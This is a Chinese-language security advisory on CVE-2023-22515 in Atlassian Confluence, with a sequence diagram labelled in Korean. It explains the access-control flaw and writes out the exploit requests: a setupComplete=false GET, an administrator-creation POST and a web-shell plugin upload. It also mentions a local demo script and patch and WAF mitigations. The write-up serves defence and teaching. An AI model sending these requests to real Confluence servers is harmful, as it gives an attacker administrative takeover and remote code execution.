[!IMPORTANT] 紧急安全警告: 此漏洞的CVSS评分为10.0 (Critical),属于最高风险漏洞。如果您正在使用受影响版本,请立即进行补丁更新。
CVE-2023-22515 是 Atlassian Confluence Data Center 和 Server 中发现的一个严重的破损访问控制漏洞。攻击者可以在无需认证的情况下远程操纵服务器的配置状态,创建管理员账户,并完全控制系统。
| 项目 | 详细信息 |
|---|---|
| 漏洞ID | CVE-2023-22515 |
| 风险等级 | CRITICAL (CVSS 10.0) |
| 影响版本 | 8.0.0 ~ 8.5.1 (需确认具体版本) |
| 攻击类型 | 身份验证绕过及权限提升 |
此漏洞通过攻击者通过 /server-info.action 端点将 bootstrapStatusProvider.applicationConfig.setupComplete 的值更改为 false 来触发。
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득[!NOTE] 核心原理:不是修改永久配置文件 (
confluence.cfg.xml),而是通过更改内存中的运行时状态来绕过访问控制逻辑的方法。
XWork2 框架的参数绑定漏洞以及 Confluence 的动作 (Action) 类 (ServerInfoAction) 中对外部输入验证缺失,导致敏感属性 (setupComplete) 可被修改。
攻击者只需简单的 HTTP 请求即可瘫痪服务器。
1. 配置初始化请求:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. 管理员创建请求:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
通过与本报告一同提供的复现套件 (cve-2023-22515-repro) 可以在安全的 Docker 环境中练习该漏洞。
包含一个可以在终端中直观查看实际黑客攻击过程的演示脚本。
# 演示执行命令
bash cinematic_pwn.sh
[!TIP] 演示脚本会对实际服务器 (
localhost:8090) 执行攻击,自动展示创建管理员账户并尝试登录的完整过程。
最可靠的解决方案是升级到 Atlassian 提供的修复版本。
如果难以打补丁,请在网络安全设备 (WAF、负载均衡器等) 上阻止对以下 URL 模式的访问。
*/setup/*CVE-2023-22515 是一个攻击难度极低但可完全控制系统的严重漏洞。安全负责人应立即应用补丁并监控是否有入侵事件。
编写日期: 2026-01-16 | 作者: Antigravity Security Analysis Team